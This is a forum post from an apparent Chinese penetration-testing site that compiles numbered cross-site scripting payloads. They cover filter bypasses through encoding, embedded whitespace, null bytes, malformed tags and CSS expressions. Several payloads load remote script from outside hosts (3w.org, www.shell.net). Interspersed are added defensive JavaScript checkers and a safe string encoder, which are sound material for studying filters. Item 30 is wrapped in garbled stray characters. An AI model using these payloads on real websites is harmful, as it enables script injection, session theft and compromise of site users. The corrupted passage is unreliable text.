中国网络渗透测试联盟

Title: XSS attack compilation

Author: admin    Time: 2016-4-28 10:06
Title: XSS attack compilation
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Unusual alert boxes

<q/oncut=alert()>
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag with a javascript: directive

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Long UTF-8 Unicode (decimal) encoding (calculator)

<IMG SRC=jav…[omitted]…S')>

(9) 7-bit decimal encoding without semicolons (calculator)

<IMG SRC=jav…[omitted]…S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(11) Embedded tab (a literal tab character splits jav and ascript)

<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the javascript: keyword

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme case of XSS

(The payload did not survive copying into this post; the vector is the javascript: IMG tag broken across many lines with carriage returns.)
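
The encoding and whitespace tricks in items 3 to 14, 17 and 19 all work because the browser normalises an attribute value before it decides whether the value is a javascript: URL. The following checker, added here as an example and not part of the original post, applies the same normalisation so a filter sees what the browser sees: character references with or without the trailing semicolon, tab/newline/CR removed anywhere, leading and trailing control characters stripped, and NUL bytes dropped (an old IE quirk). The function names and the sample list are assumptions; the host 3w.org is the post's own placeholder.

```javascript
// Added example, not from the original post: normalise an attribute value the
// way a browser does, then test it for a script-executing scheme.

// Named references kept to the few that are useful for splitting a scheme
// (assumption: a real decoder would use the full HTML5 table).
const NAMED = { Tab: "\t", NewLine: "\n", colon: ":" };

// Decode HTML character references in one pass. Per the HTML spec, numeric
// references in attribute values are accepted without a terminating ';',
// which is exactly what the "no semicolon" variants (items 9 and 10) rely on.
function decodeEntities(value) {
  const fromCode = (n) => (n > 0x10ffff ? "\ufffd" : String.fromCodePoint(n));
  return String(value).replace(
    /&#[xX]([0-9a-fA-F]+);?|&#([0-9]+);?|&(Tab|NewLine|colon);/g,
    (_, hex, dec, name) =>
      hex !== undefined ? fromCode(parseInt(hex, 16))
      : dec !== undefined ? fromCode(parseInt(dec, 10))
      : NAMED[name]
  );
}

// Strip what the URL parser strips before it looks at the scheme: tab, LF and
// CR anywhere in the value (items 11-14), leading/trailing ASCII whitespace and
// control characters (item 19), and, as an old IE quirk, NUL bytes (item 17).
function normalizeUrl(value) {
  return decodeEntities(value)
    .replace(/[\t\n\r\0]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

// True when the normalised value starts with a scheme that executes script.
// The check is case-insensitive because scheme matching is (item 4).
function isScriptUrl(value) {
  return /^(javascript|vbscript):/i.test(normalizeUrl(value));
}

// Constructed samples drawn from the list above.
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "jav\tascript:alert('XSS');",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  " &#14;  javascript:alert('XSS');",
  "java\0script:alert('XSS')",
  "http://3w.org/XSS/xss.js",
];

// Returns [value, verdict] pairs so the result can be inspected or asserted on.
function classify(values) {
  return values.map((v) => [v, isScriptUrl(v)]);
}
```

Note that a filter which only lower-cases and searches for the literal string "javascript:" fails every sample except the first two; the point of normalising first is that the attacker's encoding choices stop mattering.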

(16) Getting around a per-field length limit (all fragments must land on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte, variant 2 (null bytes rarely work on domestic sites, because there is nowhere they can be used)

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag

<IMG SRC=" &#14;  javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, variant 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS (no closing angle bracket needed)

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle bracket

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter

\";alert('XSS');//
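
Item 29 works against code that "escapes" user input for a JavaScript string by putting a backslash in front of each quote: the attacker supplies their own backslash, which escapes the escape, the string literal closes early and the rest of the input runs as code. The example below is added here and is not from the original post; it puts the naive encoder next to a correct one and runs both against the payload with a stub alert() so the breakout can be observed offline. The function names and the inline-script template are assumptions.

```javascript
// Added example, not from the original post: the escape-the-escape bypass of
// item 29 and the encoder that stops it.

// Item 29's payload, constructed here as a JS string:  \";alert('XSS');//
const PAYLOAD = "\\\";alert('XSS');//";

// Vulnerable: escapes only the double quote. The attacker's leading backslash
// becomes "\\" (a literal backslash), the next character is the closing quote,
// and everything after it is parsed as JavaScript.
function naiveLiteral(s) {
  return '"' + String(s).replace(/"/g, '\\"') + '"';
}

// Hardened: JSON.stringify escapes backslashes, quotes and control characters,
// so no input can close the literal. The extra replacements keep the literal
// safe inside an HTML <script> block (no "</script>" or "<!--" can be formed)
// and in older engines that rejected U+2028/U+2029 inside string literals.
function safeLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Assumed server-side template that drops a user value into an inline script.
function renderInlineScript(userValue, literal) {
  return "var name = " + literal(userValue) + ";";
}

// Run the rendered script with a stub alert() and report what happened. In a
// browser this would run in the victim's page; a Function body is enough to
// show whether the literal was broken out of.
function runRendered(script) {
  const alerts = [];
  const fn = new Function("alert", script + "\nreturn name;");
  const value = fn((msg) => alerts.push(String(msg)));
  return { alerts, value };
}
```

With naiveLiteral the rendered script is `var name = "\\";alert('XSS');//";`, so the variable holds a single backslash and alert('XSS') runs; with safeLiteral the variable holds the payload verbatim and nothing else executes.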

: m9 ~- C8 Q" i- u" P0 G(30)结束Title标签
% T! ^& F' f3 E$ l' d. V</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' e2 ~) b( G7 P! A9 l
' @1 ^9 p7 y+ D
(31) INPUT image

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters after the opening parenthesis (any of code points 1-32, 34, 39, 160, 8192-8203, 12288, 65279 are accepted before the scheme)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with an expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (an open angle bracket followed by a letter is enough)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with a comment inside the expression keyword

<IMG STYLE='xss:expr/*XSS*/ession(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
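
Items 37 to 53 move the payload into CSS, where a filter that only looks at HTML attributes never sees it. The checker below is added here as an example and is not part of the original post: it normalises a style value by removing CSS comments (the expr/*XSS*/ession split of item 52) and decoding CSS backslash escapes (not on this page, but the same class of bypass), lower-cases, and then looks for expression( and for url( followed by a script scheme, allowing the padding characters of item 47 between the parenthesis and the scheme. The function names are assumptions.

```javascript
// Added example, not from the original post: find the CSS-based vectors from
// the list above in a style value.

// Code points IE accepted between "url(" and the scheme (item 47): 1-32, 34, 39,
// 160, 8192-8203, 12288, 65279. 34 and 39 are the two quote characters, so the
// quoted forms url("javascript:...") are covered by the same class.
const URL_PADDING = "[\\u0001-\\u0020\"'\\u00A0\\u2000-\\u200B\\u3000\\uFEFF]";

// Remove /* ... */ comments, which CSS allows inside an identifier.
function stripCssComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, "");
}

// Decode CSS escapes: "\65 " (hex plus one optional whitespace) is "e";
// a backslash before any other character is just that character.
function decodeCssEscapes(css) {
  return css
    .replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) => {
      const cp = parseInt(hex, 16);
      return cp === 0 || cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    })
    .replace(/\\([\s\S])/g, "$1");
}

function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(String(css))).toLowerCase();
}

// url( + any run of padding characters + a script scheme.
const SCRIPT_URL = new RegExp("url\\(" + URL_PADDING + "*(javascript|vbscript):");

// Returns the names of the vectors found; an empty array means none.
function findCssScriptVectors(css) {
  const norm = normalizeCss(css);
  const hits = [];
  if (/expression\s*\(/.test(norm)) hits.push("expression");
  if (SCRIPT_URL.test(norm)) hits.push("url-script-scheme");
  return hits;
}

// Constructed samples: the style values from items 46, 47, 48, 52 and a benign one.
const CSS_SAMPLES = [
  "background-image: url(javascript:alert('XSS'))",
  "background-image: url(\u0001javascript:alert('XSS'))",
  "width: expression(alert('XSS'));",
  "xss:expr/*XSS*/ession(alert(\"XSS\"))",
  "background-image: url(https://example.com/a.png)",
];

function classifyCss(values) {
  return values.map((v) => [v, findCssScriptVectors(v)]);
}
```

expression() and the javascript: scheme in CSS are legacy Internet Explorer behaviour, so on current browsers these entries no longer execute; the checker is still useful for reviewing stored content that may be rendered by older clients or by HTML-to-PDF converters.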

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf" AllowScriptAccess="always"></EMBED>

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2